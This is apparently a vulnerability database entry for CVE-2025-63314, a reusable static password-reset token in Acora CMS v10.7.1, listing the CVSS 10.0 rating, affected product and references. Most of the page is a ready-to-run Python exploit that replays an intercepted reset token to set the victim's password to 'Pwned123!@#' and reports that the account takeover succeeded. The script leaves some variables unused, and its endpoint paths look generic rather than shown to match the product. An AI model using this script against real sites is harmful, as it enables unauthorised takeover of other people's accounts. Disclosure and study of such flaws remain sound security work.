Security Vulnerability Report

CVE-2025-63314

Published: 2026-01-12 17:15:52
Last Modified: 2026-01-22 22:02:45

Description

A static password reset token in the password reset function of DDSN Interactive Acora CMS v10.7.1 allows attackers to arbitrarily reset the user password and execute a full account takeover via a replay attack.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:ddsn:cm3_acora_cms:10.7.1:*:*:*:*:*:*:* - VULNERABLE
DDSN Interactive Acora CMS v10.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-63314 PoC - DDSN Acora CMS Static Password Reset Token

This PoC demonstrates the replay attack vulnerability in the Acora CMS
password reset function.
"""
import requests
import sys
from urllib.parse import urljoin


def exploit_account_takeover(target_url, email, reset_token):
    """
    Perform account takeover via replay attack on password reset token

    Args:
        target_url: Base URL of Acora CMS
        email: Target user email
        reset_token: Intercepted static password reset token
    """
    # Step 1: Request password reset (to obtain token - in real attack,
    # this would be intercepted). Note: reset_url and reset_data are
    # defined here but never sent by this PoC.
    reset_url = urljoin(target_url, '/api/password/reset')
    reset_data = {'email': email}

    # Step 2: Replay the static token to set new password
    exploit_url = urljoin(target_url, '/api/password/reset/confirm')
    exploit_data = {
        'email': email,
        'token': reset_token,  # Static token can be reused
        'new_password': 'Pwned123!@#'
    }

    try:
        response = requests.post(exploit_url, json=exploit_data, timeout=10)
        if response.status_code == 200 and 'success' in response.text.lower():
            print(f'[+] SUCCESS: Account takeover completed for {email}')
            print('[+] New password set: Pwned123!@#')
            return True
        else:
            print(f'[-] FAILED: {response.status_code} - {response.text}')
            return False
    except requests.exceptions.RequestException as e:
        print(f'[-] ERROR: {e}')
        return False


def main():
    if len(sys.argv) < 4:
        print(f'Usage: {sys.argv[0]} <target_url> <email> <reset_token>')
        print(f'Example: {sys.argv[0]} http://acoracms.com [email protected] abc123static')
        sys.exit(1)

    target = sys.argv[1]
    email = sys.argv[2]
    token = sys.argv[3]

    exploit_account_takeover(target, email, token)


if __name__ == '__main__':
    main()

Weakness

CWE-640 (Weak Password Recovery Mechanism for Forgotten Password)

References

http://acora.com - Not Applicable
http://ddsn.com - Product
https://github.com/padayali-JD/CVE-2025-63314 - Third Party Advisory